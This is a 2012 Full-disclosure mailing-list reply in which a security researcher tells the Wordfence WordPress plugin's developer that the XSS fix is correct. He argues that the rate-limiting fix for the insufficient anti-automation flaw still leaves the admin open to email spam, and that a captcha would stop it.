Date: Sat, 27 Oct 2012 01:57:48 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: "Mark Maunder" <mmaunder@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: XSS and IAA vulnerabilities in Wordfence
	Security for WordPress

Hi Mark!

You are welcome. As I see, you've reacted on post to Full-disclosure even
faster then on my letter to you (which I've sent you before disclosing to
security mailing lists). It is example of the power of Full-disclosure ;-).

It's good that you've quickly fixed these holes. But I'm not agree with the
way you've fixed IAA vulnerability (at that XSS is fixed correctly, as I've
checked).

You've wrote in the changelog that you added rate limiting to max of 10
requests per second to the unlock form. But it doesn't protect from
spamming.

As I've wrote in comment to IAA vulnerability in advisory at my site:
"There is no protection (captcha) against automated picking up of admin's
e-mail. And if to know admin's e-mail, then by this way it'll be possible to
spam him by letters from the site".

>>From it you can see, that your fix can't protect from this attack (as
captcha could). By sending 10 requests per second with correct e-mail, it'll
be possible to overspam admin's e-mail account (so the plugin is still
vulnerable to IAA and you need to better fix it). Also there are other
vulnerabilities in Wordfence and all of these vulnerabilities concern your
web site too.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site